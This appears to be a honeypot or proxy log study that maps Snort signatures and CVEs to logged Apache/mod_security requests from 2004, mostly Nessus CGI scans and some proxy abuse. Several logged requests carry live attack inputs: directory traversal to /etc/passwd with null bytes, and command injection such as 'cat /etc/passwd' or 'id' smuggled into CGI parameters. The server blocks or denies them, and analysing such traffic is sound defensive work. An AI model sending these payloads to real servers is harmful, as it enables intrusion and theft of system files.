The obvious attacks are proxy abuse, web attacks and brute-force attacks, but there are a lot more (about 400): 6800-50=6750
SnortID | Link | Category | Attack name | Example |
---|---|---|---|---|
509 | arachNIDS 300 | web-application-attack | WEB-MISC PCCS mysql database admin tool access | Request: 217.160.165.173 - - [Fri Mar 12 22:37:23 2004] "GET /pccsmysqladm/incs/dbconnect.inc HTTP/1.1" 403 315 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/pccsmysqladm ---------------------------------------- GET /pccsmysqladm/incs/dbconnect.inc HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
803 | CAN-2001-0253 BID2314 | web-application-attack | WEB-CGI HyperSeek hsx.cgi directory traversal attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:37:39 2004] "GET /cgi-bin/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: Invalid character detected [0] ---------------------------------------- GET /cgi-bin/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
805 | Nessus 10304 CVE-2000-0127 arachNIDS 467 | attempted-user | WEB-CGI webspeed access | Request: 217.160.165.173 - - [Fri Mar 12 22:42:09 2004] "GET /scripts/wsisa.dll/WService=anything?WSMadmin HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/scripts/wsisa.dll/WService=anything] for 50000 ms ---------------------------------------- GET /scripts/wsisa.dll/WService=anything?WSMadmin HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "WSMadmin" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
806 | BID1668 arachNIDS 462 CVE-2000-0853 | attempted-recon | WEB-CGI yabb directory traversal attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:41:54 2004] "GET /cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../etc/passwd%00 HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: Invalid character detected [0] ---------------------------------------- GET /cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../etc/passwd%00 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
807 | BID649 Nessus 10321 CVE-1999-0953 arachNIDS 463 | attempted-recon | WEB-CGI /wwwboard/passwd.txt access | Request: 217.160.165.173 - - [Fri Mar 12 22:41:17 2004] "GET /wwwboard/passwd.txt HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/wwwboard/passwd.txt] for 50000 ms ---------------------------------------- GET /wwwboard/passwd.txt HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/wwwboard/passwd\.txt" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
808 | Nessus 10592 BID2166 arachNIDS 473 | attempted-recon | WEB-CGI webdriver access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:58 2004] "GET /cgi-bin/webdriver HTTP/1.1" 403 301 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/webdriver ---------------------------------------- GET /cgi-bin/webdriver HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
810 | Nessus 10306 arachNIDS 466 CAN-1999-1063 | attempted-recon | WEB-CGI whois_raw.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:42:07 2004] "GET /cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: Invalid character detected [10] ---------------------------------------- GET /cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
812 | arachNIDS 470 CVE-2000-0282 | attempted-recon | WEB-CGI webplus version access | Request: 217.160.165.173 - - [Fri Mar 12 22:41:50 2004] "GET /cgi-bin/webplus?about HTTP/1.1" 403 299 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/webplus ---------------------------------------- GET /cgi-bin/webplus?about HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
813 | arachNIDS 471 CVE-2000-0282 | web-application-attack | WEB-CGI webplus directory traversal | Request: 217.160.165.173 - - [Fri Mar 12 22:38:04 2004] "GET /webplus?script=/../../../../etc/passwd HTTP/1.1" 403 291 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/webplus ---------------------------------------- GET /webplus?script=/../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
815 | Nessus 10301 BID2077 arachNIDS 469 CVE-1999-0196 | attempted-recon | WEB-CGI websendmail access | Request: 217.160.165.173 - - [Fri Mar 12 22:40:09 2004] "GET /cgi-bin/websendmail HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/websendmail] for 50000 ms ---------------------------------------- GET /cgi-bin/websendmail HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/websendmail" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
819 | CVE-2001-0021 | attempted-recon | WEB-CGI mmstdod.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:41:46 2004] "GET /cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES=|%20echo%20"Content-Type:%20text%2Fhtml"%3Becho%20""%20%3B%20id%00 HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/mmstdod.cgi ---------------------------------------- GET /cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES=|%20echo%20"Content-Type:%20text%2Fhtml"%3Becho%20""%20%3B%20id%00 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
820 | BID2388 CVE-2000-0975 | web-application-attack | WEB-CGI anaconda directory transversal attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:39:15 2004] "GET /cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd%00.html&passurl=/category/ HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: Invalid character detected [0] ---------------------------------------- GET /cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd%00.html&passurl=/category/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
823 | CVE-2000-0670 | attempted-recon | WEB-CGI cvsweb.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:19 2004] "GET /cvsweb.cgi/ HTTP/1.1" 403 295 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/cvsweb.cgi ---------------------------------------- GET /cvsweb.cgi/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
824 | arachNIDS 232 BID2250 CAN-1999-0238 | attempted-recon | WEB-CGI php.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:42:33 2004] "GET /php.cgi?/etc/passwd HTTP/1.1" 403 291 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/php.cgi ---------------------------------------- GET /php.cgi?/etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
827 | CVE-1999-0266 BID1995 | attempted-recon | WEB-CGI info2www access | Request: 217.160.165.173 - - [Fri Mar 12 22:41:44 2004] "GET /cgi-bin/info2www HTTP/1.1" 403 300 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/info2www ---------------------------------------- GET /cgi-bin/info2www HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
829 | BID686 CVE-1999-0045 arachNIDS 224 Nessus 10165 | attempted-recon | WEB-CGI nph-test-cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:40:06 2004] "GET /cgi-bin/nph-test-cgi HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/nph-test-cgi] for 50000 ms ---------------------------------------- GET /cgi-bin/nph-test-cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/nph-test-cgi" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
830 | CAN-1999-1177 | attempted-recon | WEB-CGI NPH-publish access | Request: 217.160.165.173 - - [Fri Mar 12 22:40:08 2004] "GET /cgi-bin/nph-publish.cgi HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/nph-publish.cgi] for 50000 ms ---------------------------------------- GET /cgi-bin/nph-publish.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/nph-publish" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
833 | BID2024 CAN-1999-0467 | attempted-recon | WEB-CGI rguest.exe access | Request: 24.127.175.68 - - [Sat Mar 13 14:49:00 2004] "GET http://amateur-facials.com/1850/20202/index.html/cgi-bin/rguest.exe;dunno;RainM; HTTP/1.0" 200 566 Handler: proxy-server Error: mod_security: pausing [http://amateur-facials.com/1850/20202/index.html/cgi-bin/rguest.exe;dunno;RainM;] for 50000 ms ---------------------------------------- GET http://amateur-facials.com/1850/20202/index.html/cgi-bin/rguest.exe;dunno;RainM; HTTP/1.0 Cache-Control: no-cache Connection: close Host: amateur-facials.com Pragma: no-cache Proxy-Connection: keep-alive Referer: http://amateur-facials.com/1850/20202/index.html/cgi-bin/rguest.exe;dunno;RainM; User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) mod_security-message: Access denied with code 200. Pattern match "/rguest\.exe" at THE_REQUEST. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1 |
835 | CVE-1999-0070 Nessus 10282 | attempted-recon | WEB-CGI test-cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:37:54 2004] "GET /test-cgi?/* HTTP/1.1" 403 292 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/test-cgi ---------------------------------------- GET /test-cgi?/* HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
836 | CAN-1999-1479 | attempted-recon | WEB-CGI textcounter.pl access | Request: 217.160.165.173 - - [Fri Mar 12 22:40:31 2004] "GET /cgi-bin/textcounter.pl HTTP/1.1" 403 306 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/textcounter.pl ---------------------------------------- GET /cgi-bin/textcounter.pl HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
837 | Nessus 10291 CVE-1999-0177 | attempted-recon | WEB-CGI uploader.exe access | Request: 217.160.165.173 - - [Fri Mar 12 22:40:52 2004] "GET /cgi-win/uploader.exe HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/cgi-win/uploader.exe] for 50000 ms ---------------------------------------- GET /cgi-win/uploader.exe HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/uploader\.exe" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
838 | Nessus 10300 CVE-1999-0176 BID2058 arachNIDS 472 | attempted-recon | WEB-CGI webgais access | Request: 217.160.165.173 - - [Fri Mar 12 22:41:30 2004] "GET /cgi-bin/webgais HTTP/1.1" 403 299 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/webgais ---------------------------------------- GET /cgi-bin/webgais HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
839 | Nessus 10071 CVE-1999-0612 arachNIDS 221 | attempted-recon | WEB-CGI finger access | Request: 217.160.165.173 - - [Fri Mar 12 22:40:32 2004] "GET /cgi-bin/finger HTTP/1.1" 403 298 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/finger ---------------------------------------- GET /cgi-bin/finger HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
840 | CAN-1999-1374 | attempted-recon | WEB-CGI perlshop.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:40 2004] "GET /cgi-bin/perlshop.cgi HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/perlshop.cgi ---------------------------------------- GET /cgi-bin/perlshop.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=43 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
842 | BID2026 CVE-1999-0147 Nessus 10095 | attempted-recon | WEB-CGI aglimpse access | Request: 217.160.165.173 - - [Fri Mar 12 22:37:41 2004] "GET /cgi-bin/aglimpse HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/aglimpse] for 50000 ms ---------------------------------------- GET /cgi-bin/aglimpse HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/aglimpse" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
844 | CAN-1999-1374 | attempted-recon | WEB-CGI args.bat access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:39 2004] "GET /cgi-dos/args.bat HTTP/1.1" 403 300 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/cgi-dos ---------------------------------------- GET /cgi-dos/args.bat HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
845 | CAN-1999-1072 | attempted-recon | WEB-CGI AT-admin.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:09 2004] "GET /cgi-bin/AT-admin.cgi HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/AT-admin.cgi] for 50000 ms ---------------------------------------- GET /cgi-bin/AT-admin.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/AT-admin\.cgi" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
846 | BID1469 CVE-1999-0937 | attempted-recon | WEB-CGI bnbform.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:46 2004] "GET /cgi-bin/bnbform.cgi HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/bnbform.cgi ---------------------------------------- GET /cgi-bin/bnbform.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=82 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
847 | BID1975 CVE-1999-0146 | attempted-recon | WEB-CGI campas access | Request: 217.160.165.173 - - [Fri Mar 12 22:37:39 2004] "GET /cgi-bin/campas HTTP/1.1" 403 298 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/campas ---------------------------------------- GET /cgi-bin/campas HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
852 | BID2024 CAN-1999-0467 | attempted-recon | WEB-CGI wguest.exe access | Request: 24.127.175.68 - - [Sat Mar 13 14:41:48 2004] "GET http://brazilian-transsexuals.com/members//cgi-bin/wguest.exe;dunno;RainM; HTTP/1.0" 200 566 Handler: proxy-server Error: mod_security: pausing [http://brazilian-transsexuals.com/members//cgi-bin/wguest.exe;dunno;RainM;] for 50000 ms ---------------------------------------- GET http://brazilian-transsexuals.com/members//cgi-bin/wguest.exe;dunno;RainM; HTTP/1.0 Cache-Control: no-cache Connection: close Host: brazilian-transsexuals.com Pragma: no-cache Proxy-Connection: keep-alive Referer: http://brazilian-transsexuals.com/members//cgi-bin/wguest.exe;dunno;RainM; User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) mod_security-message: Access denied with code 200. Pattern match "/wguest\.exe" at THE_REQUEST. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1 |
853 | CVE-1999-0149 arachNIDS 234 BID373 Nessus 10317 | attempted-recon | WEB-CGI wrap access | Request: 217.160.165.173 - - [Fri Mar 12 22:39:13 2004] "GET /cgi-bin/wrap HTTP/1.1" 403 296 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/wrap ---------------------------------------- GET /cgi-bin/wrap HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
854 | BID2020 | attempted-recon | WEB-CGI classifieds.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:34 2004] "GET /cgi-bin/classifieds.cgi HTTP/1.1" 403 307 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/classifieds.cgi ---------------------------------------- GET /cgi-bin/classifieds.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=95 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
857 | Nessus 10067 BID2056 CVE-1999-0262 | web-application-activity | WEB-CGI faxsurvey access | Request: 217.160.165.173 - - [Fri Mar 12 22:41:54 2004] "GET /cgi-bin/faxsurvey?cat%20/etc/passwd HTTP/1.1" 403 301 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/faxsurvey ---------------------------------------- GET /cgi-bin/faxsurvey?cat%20/etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
858 | CAN-1999-1154 | attempted-recon | WEB-CGI filemail access | Request: 24.127.175.68 - - [Sat Mar 13 15:03:45 2004] "GET http://members.dynamix.net/movies.html/cgi-bin/filemail.pl;dunno;RainM; HTTP/1.0" 200 566 Handler: proxy-server Error: mod_security: pausing [http://members.dynamix.net/movies.html/cgi-bin/filemail.pl;dunno;RainM;] for 50000 ms ---------------------------------------- GET http://members.dynamix.net/movies.html/cgi-bin/filemail.pl;dunno;RainM; HTTP/1.0 Cache-Control: no-cache Connection: close Host: members.dynamix.net Pragma: no-cache Proxy-Connection: keep-alive Referer: http://members.dynamix.net/movies.html/cgi-bin/filemail.pl;dunno;RainM; User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) mod_security-message: Access denied with code 200. Pattern match "/filemail\.pl" at THE_REQUEST. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1 |
861 | CVE-2000-0012 Nessus 10296 arachNIDS 210 CVE-1999-0276 BID591 | attempted-recon | WEB-CGI w3-msql access | Request: 217.160.165.173 - - [Fri Mar 12 22:47:11 2004] "GET /cgi-bin/w3-msql/index.html HTTP/1.1" 403 310 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/w3-msql ---------------------------------------- GET /cgi-bin/w3-msql/index.html HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
